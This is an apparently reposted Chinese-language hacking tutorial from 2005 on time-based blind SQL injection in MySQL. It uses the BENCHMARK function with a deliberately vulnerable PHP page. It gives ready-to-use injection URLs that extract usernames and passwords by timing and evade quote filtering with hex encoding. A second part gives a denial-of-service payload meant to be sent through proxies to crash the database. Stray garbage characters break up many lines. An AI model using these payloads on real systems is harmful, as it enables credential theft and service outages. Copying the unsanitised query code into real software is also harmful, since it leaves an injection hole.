MYSQL中BENCHMARK函数的利用

admin

MYSQL中BENCHMARK函数的利用
本文作者：SuperHei
( K2 N& m0 |9 ^3 B3 k: J7 h文章性质：原创
发布日期：2005-01-02
完成日期：2004-07-09
第一部

6 p: x$ b- A, k+ ]- Q, @6 t利用时间推延进行注射---BENCHMARK函数在注射中的利用
7 E" L* D) b$ A; t5 ]
* k& U* w( [; `# `一.前言/思路

4 c8 R7 Q+ `, a5 N9 O3 X: M　　如果你看了angel的《SQL Injection with MySQL》一文，你有会发现一般的mysql+php的注射都是通过返回错误信息，和union联合查询替换原来查询语句中的字段而直接输出敏感信息，但是有的时候，主机设置为不显示错误信息：display_errors = Off 而且有的代码中sql查询后只是简单的对查询结果进行判断，而不要求输出查询结果，我们用上面的办法注射将一无所获。我们可以采用时间推延来进行判断注射了。
2 n9 I8 J3 K/ k4 x0 ?' }- ]# ~
$ `- j& ^3 a, b# G　　本技术的主要思路：通过在构造的语句用加入执行时间推延的函数，如果我们提交的判断是正确的，那么mysql查询时间就出现推延，如果提交的判断是正确，将不会执行时间推延的函数，查询语句将不会出现推延。这样我们就可以进行判断注射。

二.关于BENCHMARK函数
# w( z& J: d+ x- @/ h
5 B3 a# [( G" c9 f　　在MySQL参考手册里可以看到如下描叙：

8 [  l& k8 ^+ G; p
--------------------------------------------------------------------------------

( H3 [- _7 g. u5 G6 x% HBENCHMARK(count,expr)
2 ]+ ^  |6 g, i. P* ]BENCHMARK()函数重复countTimes次执行表达式expr，它可以用于计时MySQL处理表达式有多快。结果值总是0。意欲用于mysql客户，它报告查询的执行时间。
5 I. N0 I% p! D0 R9 _! C- g# Kmysql> select BENCHMARK(1000000,encode("hello","goodbye"));
9 d# A6 p  Z6 ?7 X8 s+----------------------------------------------+
| BENCHMARK(1000000,encode("hello","goodbye")) |
+----------------------------------------------+
6 B$ Q0 @- J+ b% `| 0 |
6 d2 D0 C5 m% h- c# @1 s' {+----------------------------------------------+
2 R7 h) O( W) C- C9 W: H8 D6 q1 row in set (4.74 sec)
0 q+ Q6 N! D! d& ?3 l& v  J
# r4 q; f. s" Q5 N( j8 G报告的时间是客户端的经过时间，不是在服务器端的CPU时间。执行BENCHMARK()若干次可能是明智的，并且注意服务器机器的负载有多重来解释结果。


--------------------------------------------------------------------------------

4 e" O- m; s1 l9 \- B" |　　只要我们把参数count 设置大点，那么那执行的时间就会变长。下面我们看看在mysql里执行的效果：

  G3 B' n0 X$ I6 v6 [mysql> select md5( 'test' );
# q4 Y4 G; [' }% W. M+----------------------------------+
| md5( 'test' ) |
1 n/ t7 f5 @  G$ f+----------------------------------+
/ j5 q! q' p9 p5 G& K. V6 v+ s" B| 098f6bcd4621d373cade4e832627b4f6 |
+----------------------------------+
6 ~5 Y: i2 S" ?6 R/ E0 y1 row in set (0.00 sec) 〈-----------执行时间为0.00 sec
0 Q( p) u+ p* E' h
mysql> select benchmark( 500000, md5( 'test' ) );
+------------------------------------+
. `$ z; y) m& ]2 ?1 a  x# D| benchmark( 500000, md5( 'test' ) ) |
8 E; [: ~6 |3 w$ T* \* K+------------------------------------+
| 0 |
+------------------------------------+
1 row in set (6.55 sec) 〈------------执行时间为6.55 sec
* k# j; G+ [0 y2 H0 ^" o+ Z

: P. u$ K- n" c1 J　　由此可以看出使用benchmark执行500000次的时间明显比正常执行时间延长了。

三.具体例子

　　首先我们看个简单的php代码：
6 H! B% u: {( \6 g& i$ ?
< ?php
' {* n# E6 T0 c4 }$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";

: N7 b0 i, r$ a4 _* omysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

% u1 P* P' S* E9 x$sql = "SELECT * FROM article WHERE articleid=$id";
; J4 u! [0 _8 W$result = mysql_db_query($dbname,$sql);
* W9 H7 ~) o% |$row = mysql_fetch_array($result);
/ C% Z- A" g% O: n- V, I# r
if (!$row)
8 [( q2 a- R' _% @0 a{
exit;
( U2 m2 t, }% t" x  f}
?>
7 n9 E" d( y" H- F) p* p

* V0 b1 Z8 G$ T7 f8 w1 r5 L　　数据库injection结构和内容如下：

9 J2 _8 B" F; z9 D# 数据库 : `injection`
#

$ i7 n: N; C* M- p# --------------------------------------------------------

# o; G9 h9 G4 o0 p8 k1 r#
* A7 _2 b) w# [# U* r# 表的结构 `article`
" u2 |, }6 ?8 B4 f) Q#
- \) m1 S& [# ?: m5 ]
# x; q/ |; S* Z7 Y  Y( \CREATE TABLE `article` (
`articleid` int(11) NOT NULL auto_increment,
`title` varchar(100) NOT NULL default '',
`content` text NOT NULL,
PRIMARY KEY (`articleid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
! U7 {/ \6 ^2 M2 B" e( j0 k0 ]
8 h& b0 ^: i- N/ F) [1 f9 J#
3 B- t8 T; o6 u7 `/ f& n* t: p4 c& @# 导出表中的数据 `article`
- w, p" {! v& v) Y2 W8 Y" {#

INSERT INTO `article` VALUES (1, '我是一个不爱读书的孩子', '中国的教育制度真是他妈的落后！如果我当教育部长。我要把所有老师都解雇！操～');
INSERT INTO `article` VALUES (2, '我恨死你', '我恨死你了，你是什么东西啊');
1 n6 W. S$ z" i5 P$ ~
# --------------------------------------------------------
, H2 h  j- h7 ^! D/ U
# e+ @' e9 I3 C$ k#
# 表的结构 `user`
#

CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
3 P2 U9 z3 K( u; f" }% PPRIMARY KEY (`userid`)
( c' T# i4 \% H/ j2 L  g) TYPE=MyISAM AUTO_INCREMENT=3 ;

#
# 导出表中的数据 `user`
#
6 x( ]( x6 P6 `- X
9 x4 c+ ?; a" a/ MINSERT INTO `user` VALUES (1, 'angel', 'mypass');
INSERT INTO `user` VALUES (2, '4ngel', 'mypass2');


　　代码只是对查询结果进行简单的判断是否存在，假设我们已经设置display_errors=Off。我们这里就没办法利用union select的替换直接输出敏感信息(ps:这里不是说我们不利用union，因为在mysql中不支持子查询)或通过错误消息返回不同来判断注射了。我们利用union联合查询插入BENCHMARK函数语句来进行判断注射：

id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*

9 K1 p/ o1 a0 D- Q; l
　　上面语句可以猜userid为1的用户名的第一位字母的ascii码值是是否为97，如果是97，上面的查询将由于benchmark作用而延时。如果不为97，将不回出现延时，这样我们最终可以猜出管理员的用户名和密码了。 大家注意，这里有一个小技巧：在benchmark(500000,md5('test'))中我们使用了'号， 这样是很危险的，因为管理员随便设置下 就可以过滤使注射失败，我们这里test可以是用其他进制表示，如16进制。最终构造如下：
% f& I3 z: Z7 S: o) a" c, ?
& k+ I7 V6 J$ o4 mhttp://127.0.0.1/test/test/show.php?id=1%20union%20select%201,benchmark(500000,md5(0x41)),1%20from%20user%20where%20userid=1%20and%20ord(substring(username,1,1))=97%20/*
! \  h0 H! {3 C( q: x' k# L8 T. h

　　执行速度很慢，得到userid为1的用户名的第一位字母的ascii码值是是为97。

　　注意：我们在使用union select事必须知道原来语句查询表里的字段数，以往我们是根据错误消息来判断，我们在union select 1,1,1我们不停的增加1 如果字段数正确将正常返回不会出现错误，而现在不可以使用这个方法了，那我们可以利用benchmark(),我们这样构造 union select benchmark(500000,md5(0x41)) 1,1 我们在增加1的，当字段数正确时就回执行benchmark()出现延时，这样我们就可以判断字段数了。
$ \" [: F9 N% T1 \
第二部

利用BENCHMARK函数进行ddos攻击

* I# o$ T7 P" Q8 n* e* T1 {; n　　其实思路很简单：在BENCHMARK(count,expr) 中 我们只要设置count 就是执行次数足够大的话，就可以造成dos攻击了，如果我们用代理或其他同时提交，就是ddos攻击，估计数据库很快就会挂了。不过前提还是要求可以注射。语句：

' R; M$ T2 C/ t, Q0 d- uhttp://127.0.0.1/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0x41))
; }' T( B4 k/ V8 `: w9 j* a

小结

' w0 n/ V& T( V- ]) D+ v. t  |　　本文主要思路来自http://www.ngssoftware.com/papers/HackproofingMySQL.pdf，其实关于利用时间差进行注射在mssql注射里早有应用，只是所利用的函数不同而已（见http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf）。关于mysql+php一般注射的可以参考angel的文章《SQL Injection with MySQL》。

/ p4 ]+ c+ g7 @% w! @' b. X  
# f- Y# `! Z; H2 g& i